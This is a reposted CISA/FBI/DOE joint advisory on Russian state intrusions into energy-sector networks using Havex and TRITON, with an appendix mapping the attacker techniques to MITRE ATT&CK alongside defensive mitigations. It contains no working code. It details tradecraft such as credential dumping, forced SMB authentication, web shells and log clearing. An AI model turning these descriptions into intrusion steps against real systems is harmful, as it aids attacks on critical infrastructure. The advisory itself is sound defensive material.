The supply-chain attack on the U.S. energy sector targeted thousands of computers at hundreds of organizations, including at least one nuclear power plant.
Category: alerts
Cyber Security Monitor Alerts News Notifications. We monitor and send notifications on the latest Cyber Security alerts, blogs, news on data breaches and emerging cyber threats.
Original release date: March 25, 2022
CISA has added 66 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow on the of the “Date Added to Catalog” column, which will sort by descending dates.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.
This product is provided subject to this Notification and this Privacy & Use policy.
Original release date: March 24, 2022
Summary
Actions to Take Today to Protect Energy Sector Networks:
• Implement and ensure robust network segmentation between IT and ICS networks.
• Enforce MFA to authenticate to a system.
• Manage the creation of, modification of, use of—and permissions associated with—privileged accounts.
This joint Cybersecurity Advisory (CSA)—coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Energy (DOE)—provides information on multiple intrusion campaigns conducted by state-sponsored Russian cyber actors from 2011 to 2018 and targeted U.S. and international Energy Sector organizations. CISA, the FBI, and DOE responded to these campaigns with appropriate action in and around the time that they occurred. CISA, the FBI, and DOE are sharing this information in order to highlight historical tactics, techniques, and procedures (TTPs) used by adversaries to target U.S. and international Energy Sector organizations.
On March 24, 2022, the U.S. Department of Justice unsealed indictments of three Russian Federal Security Service (FSB) officers and a Russian Federation Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM) employee for their involvement in the following intrusion campaigns against U.S. and international oil refineries, nuclear facilities, and energy companies.[1]
- Global Energy Sector Intrusion Campaign, 2011 to 2018: the FSB conducted a multi-stage campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data.
- One of the indicted FSB officers was involved in campaign activity that involved deploying Havex malware to victim networks.
- The other two indicted FSB officers were involved in activity targeting U.S. Energy Sector networks from 2016 through 2018.
- Compromise of Middle East-based Energy Sector organization with TRITON Malware, 2017: Russian cyber actors with ties to the TsNIIKhM gained access to and leveraged TRITON (also known as HatMan) malware to manipulate a foreign oil refinery’s ICS controllers. TRITON was designed to specifically target Schneider Electric’s Triconex Tricon safety systems and is capable of disrupting those systems. Schneider Electric has issued a patch to mitigate the risk of the TRITON malware’s attack vector; however, network defenders should install the patch and remain vigilant against these threat actors’ TTPs.
- The indicted TsNIIKhM cyber actor is charged with attempt to access U.S. protected computer networks and to cause damage to an energy facility.
- The indicted TsNIIKhM cyber actor was a co-conspirator in the deployment of the TRITON malware in 2017.
This CSA provides the TTPs used by indicted FSB and TsNIIKhM actors in cyber operations against the global Energy Sector. Specifically, this advisory maps TTPs used in the global Energy Sector campaign and the compromise of the Middle East-based Energy Sector organization to the MITRE ATT&CK for Enterprise and ATT&CK for ICS frameworks.
CISA, the FBI, and DOE assess that state-sponsored Russian cyber operations continue to pose a threat to U.S. Energy Sector networks. CISA, the FBI, and DOE urge the Energy Sector and other critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory and Appendix A to reduce the risk of compromise.
For more information on Russian state-sponsored malicious cyber activity, see CISA’s Russia Cyber Threat Overview and Advisories webpage. For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure as well as additional mitigation recommendations, see joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure and CISA’s Shields Up Technical Guidance webpage.
Rewards for Justice Program
If you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State’s (DOS) Rewards for Justice program. You may be eligible for a reward of up to $10 million, which DOS is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact +1-202-702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details refer to rewardsforjustice.net.
Click here for a PDF version of this report.
Technical Details
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10, and the ATT&CK for ICSs framework. See the ATT&CK for Enterprise and ATT&CK for ICS frameworks for all referenced threat actor tactics and techniques.
Global Energy Sector Intrusion Campaign, 2011 to 2018
From at least 2011 through 2018, the FSB (also known as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala) conducted an intrusion campaign against international and U.S. Energy Sector organizations. The threat actor gained remote access to and deployed malware designed to collect ICS-related information on compromised Energy Sector networks, and exfiltrated enterprise and ICS data.
Beginning in 2013 and continuing through 2014, the threat actor leveraged Havex malware on Energy Sector networks. The threat actor gained access to these victim networks via spearphishing emails, redirects to compromised websites, and malicious versions of legitimate software updates on multiple ICS vendor websites. The new software updates contained installations of Havex malware, which infected systems of users who downloaded the compromised updates.
Havex is a remote access Trojan (RAT) that communicates with a command and control (C2) server. The C2 server deploys payloads that enumerate all collected network resources and uses the Open Platform Communications (OPC) standard to gather information about connected control systems devices and resources within the network. Havex allowed the actor to install additional malware and extract data, including system information, lists of files and installed programs, e-mail address books, and virtual private network (VPN) configuration files. The Havex payload can cause common OPC platforms to crash, which could cause a denial-of-service condition on applications that rely on OPC communications. Note: for additional information on Havex, see to CISA ICS Advisory ICS Focused Malware and CISA ICS Alert ICS Focused Malware (Update A).
Beginning in 2016, the threat actor began widely targeting U.S. Energy Sector networks. The actor conducted these attacks in two stages: first targeting third-party commercial organizations (such as vendors, integrators, and suppliers) and then targeting Energy Sector organizations. The threat actor used the compromised third-party infrastructure to conduct spearphishing, watering hole, and supply chain attacks to harvest Energy Sector credentials and to pivot to Energy Sector enterprise networks. After obtaining access to the U.S. Energy Sector networks, the actor conducted network discovery, moved laterally, gained persistence, then collected and exfiltrated information pertaining to ICS from the enterprise, and possibly operational technology (OT), environments. Exfiltrated information included: vendor information, reference documents, ICS architecture, and layout diagrams.
For more detailed information on FSB targeting of U.S. Energy Sector networks, See CISA Alert Russian Government Cyber Activity Targeting Energy Sector and Other Critical Infrastructure Sectors.
Refer to Appendix A for TTPs of Havex malware and TTPs used by the actor in the 2016 to 2018 targeting of U.S. Energy Sector networks, as well as associated mitigations.
Compromise of Middle East-based Energy Sector Organization with TRITON Malware, 2017
In 2017, Russian cyber actors with ties to TsNIIKhM gained access to and manipulated a foreign oil refinery’s safety devices. TsNIIKhM actors used TRITON malware on the ICS controllers, which resulted in the refinery shutting down for several days.
TRITON is a custom-built, sophisticated, multi-stage malware affecting Schneider Electric’s Triconex Tricon, a safety programmable logic controller (PLC) (also referred to as a safety instrumented system [SIS]), which monitors industrial processes to prevent hazardous conditions. TRITON is capable of directly interacting with, remotely controlling, and compromising these safety systems. As these systems are used in a large number of environments, the capacity to disable, inhibit, or modify the ability of a process to fail safely could result in physical consequences. Note: for additional information on affected products, see to CISA ICS Advisory Schneider Electric Triconex Tricon (Update B).
TRITON malware affects Triconex Tricon PLCs by modifying in-memory firmware to add additional programming. The extra functionality allows an attacker to read/modify memory contents and execute custom code, disabling the safety system.
TRITON malware has multiple components, including a custom Python script, four Python modules, and malicious shellcode that contains an injector and a payload. For detailed information on TRITON’s components, refer to CISA Malware Analysis Report (MAR): HatMan: Safety System Targeted Malware (Update B).
Note: the indicted TsNIIKhM cyber actor was also involved in activity targeting U.S. Energy Sector companies in 2018, and other TsNIIKhM-associated actors have targeted a U.S.-based company’s facilities in an attempt to access the company’s OT systems. To date, CISA, FBI, and DOE have no information to indicate these actors have intentionally disrupted any U.S. Energy Sector infrastructure.
Refer to Appendix A for TTPs used by TRITON as well as associated mitigations.
Mitigations
Enterprise Environment
CISA, the FBI, and DOE recommend Energy Sector and other critical infrastructure organizations implement the following mitigations to harden their corporate enterprise network. These mitigations are tailored to combat multiple enterprise techniques observed in these campaigns (refer to Appendix A for observed TTPs and additional mitigations).
Privileged Account Management
- Manage the creation of, modification of, use of—and permissions associated with—privileged accounts, including
SYSTEMand root.
Password Policies
- Set and enforce secure password policies for accounts.
Disable or Remove Features or Programs
- Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
Audit
- Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.
Operating System Configuration
- Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
Multifactor Authentication
- Enforce multifactor authentication (MFA) by requiring users to provide two or more pieces of information (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.
Filter Network Traffic
- Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
Network Segmentation
- Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a demilitarized zone (DMZ) to contain any internet-facing services that should not be exposed from the internal network.
Limit Access to Resources over the Network
- Prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, Remote Desktop Protocol (RDP) gateways, etc.
Execution Prevention
- Block execution of code on a system through application control, and/or script blocking.
Industrial Control System Environment
CISA, the FBI, and DOE recommend Energy Sector and other critical infrastructure organizations implement the following mitigations to harden their ICS/OT environment.
Network Segmentation
- Implement and ensure robust network segmentation between IT and ICS networks to limit the ability of cyber threat actors to move laterally to ICS networks if the IT network is compromised.
- Implement a network topology for ICS that has multiple layers, with the most critical communications occurring in the most secure and reliable layer. For more information refer to National Institute of Standard and Technology Special Publication 800-82: Guide to Industrial Control Systems (ICS) Security. Further segmentation should be applied to portions of the network that are reliant on one another by functionality. Figure 5 on page 26 of the CISA ICS Defense in Depth Strategy document describes this architecture.
- Use one-way communication diodes to prevent external access, whenever possible.
- Set up DMZs to create a physical and logical subnetwork that acts as an intermediary for connected security devices to avoid exposure.
- Employ reliable network security protocols and services where feasible.
- Consider using virtual local area networks (VLANs) for additional network segmentation, for example, by placing all printers in separate, dedicated VLANs and restricting users’ direct printer access. This same principle can be applied to segmentation of portions of the process for which devices are used. As an example, systems that are only involved in the creation of one component within an assembly line that is not directly related to another component can be on separate VLANs, which allows for identification of any unexpected communication, as well as segmentation against potential risk exposure on a larger scale.
- Implement perimeter security between network segments to limit the ability of cyber threat actors to move laterally.
- Control traffic between network segments by using firewalls, intrusion detection systems (IDSs), and rules for filtering traffic on routers and switches.
- Implement network monitoring at key chokepoints—including egress points to the internet, between network segments, core switch locations—and at key assets or services (e.g., remote access services).
- Configure an IDS to create alarms for any ICS traffic outside normal operations (after establishing a baseline of normal operations and network traffic).
- Configure security incident and event monitoring to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts.
ICS Best Practices
- Update all software. Use a risk-based assessment strategy to determine which ICS networks, assets, and zones should participate in the patch management program.
- Test all patches in out-of-band testing environments before implementation into production environments.
- Implement application allow listing on human machine interfaces and engineering workstations.
- Harden software configuration on field devices, including tablets and smartphones.
- Replace all end-of-life software and hardware devices.
- Disable unused ports and services on ICS devices (after testing to ensure this will not affect ICS operation).
- Restrict and manage remote access software. Enforce MFA for remote access to ICS networks.
- Configure encryption and security for network protocols within the ICS environment.
- Do not allow vendors to connect their devices to the ICS network. Use of a compromised device could introduce malware.
- Disallow any devices that do not live solely on the ICS environment from communicating on the platform. ‘Transient devices’ provide risk exposure to the ICS environment from malicious activity in the IT or other environments to which they connect.
- Maintain an ICS asset inventory of all hardware, software, and supporting infrastructure technologies.
- Maintain robust host logging on critical devices within the ICS environment, such as jump boxes, domain controllers, repository servers, etc. These logs should be aggregated into a centralized log server for review.
- Ensure robust physical security is in place to prevent unauthorized personal from accessing controlled spaces that house ICS equipment.
- Regularly test manual controls so that critical functions can be kept running if ICS/OT networks need to be taken offline.
Contact Information
All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.
References
[1] https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical
[2] https://collaborate.mitre.org/attackics/index.php/Software/S0003
[3] https://collaborate.mitre.org/attackics/index.php/Software/S0003
[4] https://collaborate.mitre.org/attackics/index.php/Software/S0013
APPENDIX A: CAMPAIGN AND MALWARE TACTICS, TECHNIQUES, AND PROCEDURES
Global Energy Sector Campaign: Havex Malware
Table 1 maps Havex’s capabilities to the ATT&CK for Enterprise framework, and table 2 maps Havex’s capabilities to the ATT&CK for ICS framework. Table 1 also provides associated mitigations. For additional mitigations, refer to the Mitigations section of this advisory.
Table 1: Enterprise Domain Tactics and Techniques for Havex [2]
| Tactic | Technique | Use | Detection/Mitigations |
|
Persistence [TA0003] |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] |
Havex adds Registry Run keys to achieve persistence. |
Monitor: monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as |
|
Privilege Escalation [TA0004] |
Process Injection [T1055] Note: this technique also applies to:
|
Havex injects itself into |
Behavior Prevention on End Point: use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, Application Programming Interface (API) call, etc., behavior. Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including |
|
Defense Evasion [TA0005] |
Indicator Removal on Host: File Deletion [T1070.004] |
Havex contains a cleanup module that removes traces of itself from victim networks. |
Monitor: monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network, which an adversary could introduce. Some monitoring tools may collect command-line arguments but may not capture |
|
Credential Access [TA0006] |
Credentials from Password Stores: Credentials from Web Browsers [T1555.003] |
Havex may contain a publicly available web browser password recovery tool. |
Password Policies: set and enforce secure password policies for accounts. |
|
Discovery [TA0007] |
Account Discovery: Email Account [T1087.003] |
Havex collects address book information from Outlook |
Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation (WMI) and PowerShell. |
|
File and Directory Discovery [T1083] |
Havex collects information about available drives, default browser, desktop file list, My Documents, internet history, program files, and root of available drives. |
Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell. |
|
|
Process Discovery [T1057] |
Havex collects information about running processes. |
Monitor: normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell. |
|
|
System Information Discovery [T1082] |
Havex collects information about the OS and computer name. |
Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell. In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations. |
|
|
System Network Configuration Discovery [T1016] |
Havex collects information about the internet adapter configuration. |
Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell. | |
| System Owner/User Discovery [T1033] | Havex collects usernames. | ||
|
Collection [TA0009] |
Archive Collected Data [T1560] |
Havex writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server. |
Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses. |
|
Command and Control [TA0011] |
Data Encoding: Standard Encoding [T1132.001] |
Havex uses standard Base64 + bzip2 or standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers. |
Detect: analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes using the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. |
Table 2: ICS Domain Tactics and Techniques for Havex [3]
| Tactic | Technique | Use |
| Initial Access | Spearphishing Attachment [T0865] | Havex is distributed through a Trojanized installer attached to emails. |
|
Supply Chain Compromise [T0862] Note: this activity also applies to Tactic: Drive by Compromise [T0817] |
Havex is distributed through Trojanized installers planted on compromised vendor websites. | |
| Execution | User Execution [T0863] | Execution of Havex relies on a user opening a Trojanized installer attached to an email. |
| Discovery | Remote System Discovery [T0846] | Havex uses Windows networking (WNet) to discover all the servers, including OPC servers that are reachable by the compromised machine over the network. |
| Remote System Information Discovery [T0888] | Havex gathers server information, including CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth. | |
| Collection | Automated Collection [T0802] | Havex gathers information about connected control systems devices. |
| Point & Tag Identification [T0861] | Havex can enumerate OPC tags; specifically tag name, type, access, and ID. | |
| Inhibit Response Function | Denial of Service [T0814] | Havex has caused multiple common OPC platforms to intermittently crash. |
| Impact | Denial of Control [T0813] | Havex can cause PLCs inability to control connected systems. |
Global Energy Sector Campaign: 2016 to 2018 U.S. Energy Sector Targeting
Table 3 maps the 2016 to 2018 U.S. Energy Sector targeting activity to the MITRE ATT&CK Enterprise framework. Mitigations for techniques are also provided in table. For additional mitigations, refer to the Mitigations section of this advisory.
Table 3: Energy Sector Campaign, 2016 to 2018 targeting U.S. Energy Sector: Observed MITRE ATT&CK Enterprise Tactics and Techniques
| Tactic | Technique | Use | Detection/Mitigations |
| Reconnaissance [TA0043] | Gather Victim Identity Information: Credentials [T1589.001] |
The threat actor harvested credentials of third-party commercial organizations by sending spearphishing emails that contained a PDF attachment. The PDF attachment contained a shortened URL that, when clicked, led users to a website that prompted the user for their email address and password. Note: this activity also applies to: |
Software Configuration: implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates. User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction. |
| Resource Development [TA0042] | Compromise Infrastructure: Server [T1584.004] | The threat actor created watering holes on compromised third-party organizations’ domains. | This activity typically takes place outside the visibility of target organizations, making detection of this behavior difficult. Ensure that users browse the internet securely. Prevent intentional and unintentional download of malware or rootkits, and users from accessing infected or malicious websites. Treat all traffic as untrusted, even if it comes from a partner website or popular domain. |
| Initial Access [TA0001] | Valid Accounts [T1078] | The threat actor obtained access to Energy Sector targets by leveraging compromised third-party infrastructure and previously compromised Energy Sector credentials against remote access services and infrastructure—specifically VPN, RDP, and Outlook Web Access—where MFA was not enabled. |
Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system. Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including Update Software: perform regular software updates to mitigate exploitation risk. Exploit Protection: use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring. Application Isolation and Sandboxing: restrict execution of code to a virtual environment on or in transit to an endpoint system. |
| External Remote Services [T1133] | The threat actor installed VPN clients on compromised third-party targets to connect to Energy Sector networks. |
Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system. Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc. Disable or Remove Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries. |
|
| Execution [TA0002] |
Command and Scripting Interpreter: PowerShell [T1059.001] |
During an RDP session, the threat actor used a PowerShell Script to create an account within a victim’s Microsoft Exchange Server. Note: this activity also applies to: |
Antivirus/Antimalware: use signatures or heuristics to detect malicious software. Code Signing: enforce binary and application integrity with digital signature verification to prevent untrusted code from executing. Disable or Remove Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries. Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root. |
| Command and Scripting Interpreter: Windows Command Shell [T1059.003] |
The threat actor used a JavaScript with an embedded Command Shell script to:
Note: this activity also applies to: |
Execution Prevention: block execution of code on a system through application control, and/or script blocking. | |
| Scheduled Task/Job: Scheduled Task [T1053.005] | The threat actor created a Scheduled Task to automatically log out of a newly created account every eight hours. |
Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses. Harden Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques. Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including User Account Management: manage the creation of, modification of, use of, and permissions associated with user accounts. |
|
| Persistence [TA0003] | Create Account: Local Account [T1136.001] | The threat actor created local administrator accounts on previously compromised third-party organizations for reconnaissance and to remotely access Energy Sector targets. MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system. |
MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system. Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including |
| Server Software Component: Web Shell [T1505.003] | The threat actor created webshells on Energy Sector targets’ publicly accessible email and web servers. | Detect: the portion of the webshell that is on the server may be small and look innocuous. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server’s content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. | |
| Defense Evasion [TA0005] | Indicator Removal on Host: Clear Windows Event Logs [T1070.001] |
The threat actor created new accounts on victim networks to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actor also removed applications they installed while they were in the network along with any logs produced. For example, the VPN client installed at one third-party commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted. Note: this activity also applies to: |
Encrypt Sensitive Information: protect sensitive information with strong encryption. Remote Data Storage: use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information. Restrict File and Directory Permissions: restrict access by setting directory and file permissions that are not specific to users or privileged accounts. |
| Indicator Removal on Host: File Deletion [T1070.004] |
The threat actor cleaned up target networks by deleting created screenshots and specific registry keys. The threat actor also deleted all batch scripts, output text documents, and any tools they brought into the environment, such as Note: this activity also applies to:
|
Monitor: monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe. |
|
| Technique: Masquerading [T1036] | After downloading tools from a remote server, the threat actor renamed the extensions. |
Restrict File and Directory Permissions: restrict access by setting directory and file permissions that are not specific to users or privileged accounts. Code Signing: enforce binary and application integrity with digital signature verification to prevent untrusted code from executing. Execution Prevention: block execution of code on a system through application control, and/or script blocking. |
|
| Credential Access [TA0006] | Brute Force: Password Cracking [T1110.002] |
The threat actor used password-cracking techniques to obtain the plaintext passwords from obtained credential hashes. The threat actor dropped and executed open-source and free password cracking tools such as Hydra, SecretsDump, and CrackMapExec, and Python. |
MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system. Password Policies: set and enforce secure password policies for accounts. |
| Forced Authentication [T1187] | Microsoft Word attachments sent via spearphishing emails leveraged legitimate Microsoft Office functions for retrieving a document from a remote server over Server Message Block (SMB) using Transmission Control Protocol ports 445 or 139. As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) |
Password Policies: set and enforce secure password policies for accounts. Filter Network Traffic: use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. |
|
| The threat actor’s watering hole sites contained altered JavaScript and PHP files that requested a file icon using SMB from an IP address controlled by the threat actors. | |||
|
The threat actor manipulated Note: this activity also applies to: |
|||
| OS Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory [T1003.001] | The threat actor used an Administrator PowerShell prompt to enable the WDigest authentication protocol to store plaintext passwords in the LSASS memory. With this enabled, credential harvesting tools can dump passwords from this process’s memory. |
Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques. Password Policies: set and enforce secure password policies for accounts. Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including Privileged Process Integrity: protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures. User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction. Credential Access Protection: use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping. |
|
| OS Credential Dumping: NTDS [T1003.003] | The threat actor collected the files ntds.dit. The file ntds.dit is the Active Directory (AD) database that contains all information related to the AD, including encrypted user passwords. |
Monitor: monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the Privileged Account Management: manage the creation of, modification of, se of, and permissions associated with privileged accounts, including User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction. |
|
| Discovery [TA0007] | Remote System Discovery [T1018] |
The threat actor used privileged credentials to access the Energy Sector victim’s domain controller. Once on the domain controller, the threat actors used batch scripts Note: this activity also applies to: |
Monitor: normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Monitor for processes that can be used to discover remote systems, such as |
| The threat actor accessed workstations and servers on corporate networks that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. | |||
|
The actor targeted and copied profile and configuration information for accessing ICS systems on the network. The threat actor copied Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems and took screenshots of a Human Machine Interface (HMI). Note: this activity also applies to |
|||
| File and Directory Discovery [T1083] |
The actor used Note: this activity also applies to: |
This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. | |
| The threat actor conducted reconnaissance operations within the network. The threat actor focused on identifying and browsing file servers within the intended victim’s network. | |||
| Lateral Movement [TA0008] | Lateral Tool Transfer [T1570] |
The threat actor moved laterally via Note: this activity also applies to: |
Network Intrusion Prevention: use intrusion detection signatures to block traffic at network boundaries. Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques. Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including User Account Management: manage the creation of, modification o, se of, and permissions associated with user accounts. Disable or Remove Feature or Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries. Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system. Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc. Filter Network Traffic: use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. Limit Software Installation: block users or groups from installing unapproved software. |
| Collection [TA0009] | Data from Local System [T1005] | The threat actor collected the Windows SYSTEM registry hive file, which contains host configuration information. |
Monitor: monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as WMI and PowerShell. |
| Archive Collected Data: Archive via Utility [T1560.001] | The threat actor compressed the ntds.dit file and the SYSTEM registry hive they had collected into archives named SYSTEM.zip and comps.zip. |
Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. | |
| Screen Capture [T1113] |
The threat actor used Windows’ Scheduled Tasks and batch scripts, to execute Note: this activity also applies to: |
Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system. Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc. Disable or Remove Feature or Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries. |
|
|
The actor used batch scripts labeled Note: this activity also applies to: |
|||
| Command and Control [TA0011] | Ingress Tool Transfer [T1105] | The threat actor downloaded tools from a remote server. |
